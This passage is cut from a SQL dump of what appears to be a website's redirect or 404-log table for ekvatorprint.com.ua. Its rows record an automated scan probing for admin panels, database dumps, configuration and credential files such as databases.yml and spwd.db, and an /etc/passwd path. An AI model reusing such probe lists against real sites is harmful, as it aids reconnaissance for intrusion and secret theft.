00:00:00',301),(8362,'http://ekvatorprint.com.ua/snoop.jsp',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8363,'http://ekvatorprint.com.ua/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml',NULL,'','',2,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8364,'http://ekvatorprint.com.ua/soapserver/',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8365,'http://ekvatorprint.com.ua/snp',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8366,'http://ekvatorprint.com.ua/software',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8367,'http://ekvatorprint.com.ua/soft_admin',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8368,'http://ekvatorprint.com.ua/soap/',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8369,'http://ekvatorprint.com.ua/soft-admin',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8370,'http://ekvatorprint.com.ua/sohoadmin',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8371,'http://ekvatorprint.com.ua/solutions',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8372,'http://ekvatorprint.com.ua/sp',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8373,'http://ekvatorprint.com.ua/space',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8374,'http://ekvatorprint.com.ua/solr/admin/',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8375,'http://ekvatorprint.com.ua/spam',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8376,'http://ekvatorprint.com.ua/spamlog.log',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8377,'http://ekvatorprint.com.ua/spadmin',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8378,'http://ekvatorprint.com.ua/spec/lib/database.yml',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8379,'http://ekvatorprint.com.ua/spacer',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8380,'http://ekvatorprint.com.ua/source.php',NULL,'','',1,0,'2017-01-20 13:29:19','0000-00-00 00:00:00',301),(8381,'http://ekvatorprint.com.ua/spec/lib/settings.local.yml',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8382,'http://ekvatorprint.com.ua/special',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8383,'http://ekvatorprint.com.ua/spwd.db',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8384,'http://ekvatorprint.com.ua/sponsors',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8385,'http://ekvatorprint.com.ua/spool',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8386,'http://ekvatorprint.com.ua/sports',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8387,'http://ekvatorprint.com.ua/spy.aspx',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8388,'http://ekvatorprint.com.ua/sql',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8389,'http://ekvatorprint.com.ua/sql.',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8390,'http://ekvatorprint.com.ua/sql.inc',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8391,'http://ekvatorprint.com.ua/sql.tgz',NULL,'','',7,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8392,'http://ekvatorprint.com.ua/sql.tar',NULL,'','',3,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8393,'http://ekvatorprint.com.ua/sql.zip',NULL,'','',4,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8394,'http://ekvatorprint.com.ua/sql/index.php',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8395,'http://ekvatorprint.com.ua/sql_dumps',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8396,'http://ekvatorprint.com.ua/sql_error.log',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8397,'http://ekvatorprint.com.ua/sqladm',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8398,'http://ekvatorprint.com.ua/sqlbuddy',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8399,'http://ekvatorprint.com.ua/sqlbuddy/login.php',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8400,'http://ekvatorprint.com.ua/sqladmin',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8401,'http://ekvatorprint.com.ua/sqli/',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8402,'http://ekvatorprint.com.ua/sqlmanager/',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8403,'http://ekvatorprint.com.ua/sqlnet',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8404,'http://ekvatorprint.com.ua/sqlweb/',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8405,'http://ekvatorprint.com.ua/sqlnet.log',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8406,'http://ekvatorprint.com.ua/sqlmigrate.php',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8407,'http://ekvatorprint.com.ua/squirrelmail',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8408,'http://ekvatorprint.com.ua/src',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8409,'http://ekvatorprint.com.ua/ssadmin',NULL,'','',1,0,'2017-01-20 13:29:20','0000-00-00 00:00:00',301),(8410,'http://ekvatorprint.com.ua/ssodad',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8411,'http://ekvatorprint.com.ua/stadmin',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8412,'http://ekvatorprint.com.ua/ssl_admin',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8413,'http://ekvatorprint.com.ua/sswadmin',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8414,'http://ekvatorprint.com.ua/staff',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8415,'http://ekvatorprint.com.ua/sspadmin',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8416,'http://ekvatorprint.com.ua/staffadmin',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8417,'http://ekvatorprint.com.ua/start',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8418,'http://ekvatorprint.com.ua/start.',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8419,'http://ekvatorprint.com.ua/statistics/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8420,'http://ekvatorprint.com.ua/stat/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8421,'http://ekvatorprint.com.ua/statistics',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8422,'http://ekvatorprint.com.ua/static',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8423,'http://ekvatorprint.com.ua/stats/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8424,'http://ekvatorprint.com.ua/statistics.jsp',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8425,'http://ekvatorprint.com.ua/stats',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8426,'http://ekvatorprint.com.ua/status',NULL,'','',27,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8427,'http://ekvatorprint.com.ua/status.xsl',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8428,'http://ekvatorprint.com.ua/statusicon/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8429,'http://ekvatorprint.com.ua/status/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8430,'http://ekvatorprint.com.ua/statuspoll',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8431,'http://ekvatorprint.com.ua/statystyka/',NULL,'','',1,0,'2017-01-20 13:29:21','0000-00-00 00:00:00',301),(8432,'http://ekvatorprint.com.ua/store-admin',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8433,'http://ekvatorprint.com.ua/store_admin',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8434,'http://ekvatorprint.com.ua/store',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8435,'http://ekvatorprint.com.ua/storage',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8436,'http://ekvatorprint.com.ua/storeadmin',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8437,'http://ekvatorprint.com.ua/story',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8438,'http://ekvatorprint.com.ua/stories',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8439,'http://ekvatorprint.com.ua/strona_1',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8440,'http://ekvatorprint.com.ua/strona_12',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8441,'http://ekvatorprint.com.ua/strona_10',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8442,'http://ekvatorprint.com.ua/strona_13',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8443,'http://ekvatorprint.com.ua/strona_11',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8444,'http://ekvatorprint.com.ua/strona_16',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8445,'http://ekvatorprint.com.ua/strona_15',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8446,'http://ekvatorprint.com.ua/strona_2',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8447,'http://ekvatorprint.com.ua/strona_19',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8448,'http://ekvatorprint.com.ua/strona_17',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8449,'http://ekvatorprint.com.ua/strona_14',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8450,'http://ekvatorprint.com.ua/strona_18',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8451,'http://ekvatorprint.com.ua/strona_20',NULL,'','',1,0,'2017-01-20 13:29:22','0000-00-00 00:00:00',301),(8452,'http://ekvatorprint.com.ua/strona_21',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8453,'http://ekvatorprint.com.ua/strona_3',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8454,'http://ekvatorprint.com.ua/strona_4',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8455,'http://ekvatorprint.com.ua/strona_6',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8456,'http://ekvatorprint.com.ua/strona_5',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8457,'http://ekvatorprint.com.ua/stronghold-info',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8458,'http://ekvatorprint.com.ua/strona_8',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8459,'http://ekvatorprint.com.ua/strona_7',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8460,'http://ekvatorprint.com.ua/strona_9',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8461,'http://ekvatorprint.com.ua/stronghold-status',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8462,'http://ekvatorprint.com.ua/styles/prosilver/style.cfg',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8463,'http://ekvatorprint.com.ua/styles',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8464,'http://ekvatorprint.com.ua/style',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8465,'http://ekvatorprint.com.ua/subadmin',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8466,'http://ekvatorprint.com.ua/subscribe',NULL,'','',1,0,'2017-01-20 13:29:23','0000-00-00 00:00:00',301),(8467,'http://ekvatorprint.com.ua/submit_article.php',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8468,'http://ekvatorprint.com.ua/submit_article.',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8469,'http://ekvatorprint.com.ua/submit',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8470,'http://ekvatorprint.com.ua/subscribe.html',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8471,'http://ekvatorprint.com.ua/sugarcrm',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8472,'http://ekvatorprint.com.ua/sugarcrm.log',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8473,'http://ekvatorprint.com.ua/sunvalleyadmin',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8474,'http://ekvatorprint.com.ua/superadmin',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8475,'http://ekvatorprint.com.ua/survey',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8476,'http://ekvatorprint.com.ua/support',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8477,'http://ekvatorprint.com.ua/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8478,'http://ekvatorprint.com.ua/surgemail/',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8479,'http://ekvatorprint.com.ua/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8480,'http://ekvatorprint.com.ua/support_admin',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8481,'http://ekvatorprint.com.ua/surveyadmin',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8482,'http://ekvatorprint.com.ua/svn',NULL,'','',1,0,'2017-01-20 13:29:24','0000-00-00 00:00:00',301),(8483,'http://ekvatorprint.com.ua/svn.revision',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8484,'http://ekvatorprint.com.ua/svn/',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8485,'http://ekvatorprint.com.ua/swf',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8486,'http://ekvatorprint.com.ua/symfony/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8487,'http://ekvatorprint.com.ua/sym/root/home/',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8488,'http://ekvatorprint.com.ua/sxd/',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8489,'http://ekvatorprint.com.ua/swfupload',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8490,'http://ekvatorprint.com.ua/symfony/apps/frontend/config/settings.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8491,'http://ekvatorprint.com.ua/symphony/apps/frontend/config/app.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8492,'http://ekvatorprint.com.ua/symphony/apps/frontend/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8493,'http://ekvatorprint.com.ua/symphony/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8494,'http://ekvatorprint.com.ua/symphony/config/app.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8495,'http://ekvatorprint.com.ua/symfony/apps/frontend/config/routing.yml',NULL,'','',1,0,'2017-01-20 13:29:25','0000-00-00 00:00:00',301),(8496,'http://ekvatorprint.com.ua/sys_log/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8497,'http://ekvatorprint.com.ua/sysadmin',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8498,'http://ekvatorprint.com.ua/sys_admin',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8499,'http://ekvatorprint.com.ua/sysadmins',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8500,'http://ekvatorprint.com.ua/sys-admin',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8501,'http://ekvatorprint.com.ua/sysadmin.php',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8502,'http://ekvatorprint.com.ua/sysstat/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8503,'http://ekvatorprint.com.ua/sysbackup',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8504,'http://ekvatorprint.com.ua/syslog/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8505,'http://ekvatorprint.com.ua/sysadmins/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8506,'http://ekvatorprint.com.ua/system',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8507,'http://ekvatorprint.com.ua/system.log',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8508,'http://ekvatorprint.com.ua/system/error.txt',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8509,'http://ekvatorprint.com.ua/system/log/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8510,'http://ekvatorprint.com.ua/system/cron/cron.txt',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8511,'http://ekvatorprint.com.ua/system/',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8512,'http://ekvatorprint.com.ua/systemadmin',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8513,'http://ekvatorprint.com.ua/tag',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8514,'http://ekvatorprint.com.ua/t',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8515,'http://ekvatorprint.com.ua/t00.php',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8516,'http://ekvatorprint.com.ua/tadmin',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8517,'http://ekvatorprint.com.ua/taglib-uri',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8518,'http://ekvatorprint.com.ua/tar.bz2',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8519,'http://ekvatorprint.com.ua/tar',NULL,'','',1,0,'2017-01-20 13:29:26','0000-00-00 00:00:00',301),(8520,'http://ekvatorprint.com.ua/tags',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8521,'http://ekvatorprint.com.ua/tar.gz',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8522,'http://ekvatorprint.com.ua/te_admin',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8523,'http://ekvatorprint.com.ua/tbadmin',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8524,'http://ekvatorprint.com.ua/tech',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8525,'http://ekvatorprint.com.ua/teknoportal/readme.txt',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8526,'http://ekvatorprint.com.ua/technology',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8527,'http://ekvatorprint.com.ua/technico.txt',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8528,'http://ekvatorprint.com.ua/teleadmin',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8529,'http://ekvatorprint.com.ua/telphin.log',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8530,'http://ekvatorprint.com.ua/teluguadmin',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8531,'http://ekvatorprint.com.ua/temp.php',NULL,'','',11,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8532,'http://ekvatorprint.com.ua/temp',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8533,'http://ekvatorprint.com.ua/template.xml',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8534,'http://ekvatorprint.com.ua/template',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8535,'http://ekvatorprint.com.ua/template/',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8536,'http://ekvatorprint.com.ua/temp/',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8537,'http://ekvatorprint.com.ua/templates_admin',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8538,'http://ekvatorprint.com.ua/templates/ja-helio-farsi/index.php',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8539,'http://ekvatorprint.com.ua/templates_c',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8540,'http://ekvatorprint.com.ua/test.asp',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8541,'http://ekvatorprint.com.ua/templets',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8542,'http://ekvatorprint.com.ua/terms',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8543,'http://ekvatorprint.com.ua/test.aspx',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8544,'http://ekvatorprint.com.ua/test.html',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8545,'http://ekvatorprint.com.ua/test.htm',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8546,'http://ekvatorprint.com.ua/test.jsp',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8547,'http://ekvatorprint.com.ua/test.chm',NULL,'','',1,0,'2017-01-20 13:29:27','0000-00-00 00:00:00',301),(8548,'http://ekvatorprint.com.ua/test.sqlite',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8549,'http://ekvatorprint.com.ua/test.mdb',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8550,'http://ekvatorprint.com.ua/test.txt',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8551,'http://ekvatorprint.com.ua/test/',NULL,'','',5,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8552,'http://ekvatorprint.com.ua/test1',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8553,'http://ekvatorprint.com.ua/test0',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8554,'http://ekvatorprint.com.ua/test1.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8555,'http://ekvatorprint.com.ua/test123.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8556,'http://ekvatorprint.com.ua/test0.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8557,'http://ekvatorprint.com.ua/test2',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8558,'http://ekvatorprint.com.ua/test2.html',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8559,'http://ekvatorprint.com.ua/test2.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8560,'http://ekvatorprint.com.ua/test7.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8561,'http://ekvatorprint.com.ua/test3.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8562,'http://ekvatorprint.com.ua/test4.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8563,'http://ekvatorprint.com.ua/test6.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8564,'http://ekvatorprint.com.ua/test5.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8565,'http://ekvatorprint.com.ua/test9.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8566,'http://ekvatorprint.com.ua/test8.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8567,'http://ekvatorprint.com.ua/test_',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8568,'http://ekvatorprint.com.ua/test_ip.php',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8569,'http://ekvatorprint.com.ua/testadmin',NULL,'','',1,0,'2017-01-20 13:29:28','0000-00-00 00:00:00',301),(8570,'http://ekvatorprint.com.ua/testing',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8571,'http://ekvatorprint.com.ua/tests',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8572,'http://ekvatorprint.com.ua/testimonials',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8573,'http://ekvatorprint.com.ua/tests/phpunit_report.xml',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8574,'http://ekvatorprint.com.ua/testweb',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8575,'http://ekvatorprint.com.ua/text',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8576,'http://ekvatorprint.com.ua/thank-you.php',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8577,'http://ekvatorprint.com.ua/text-base/etc/passwd',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8578,'http://ekvatorprint.com.ua/themes',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8579,'http://ekvatorprint.com.ua/theme',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8580,'http://ekvatorprint.com.ua/thank-you.',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8581,'http://ekvatorprint.com.ua/thanks.',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8582,'http://ekvatorprint.com.ua/system/logs/',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8583,'http://ekvatorprint.com.ua/thirdparty/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8584,'http://ekvatorprint.com.ua/thread',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8585,'http://ekvatorprint.com.ua/threads',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8586,'http://ekvatorprint.com.ua/thumb.php',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8587,'http://ekvatorprint.com.ua/thumb',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8588,'http://ekvatorprint.com.ua/thumb.',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 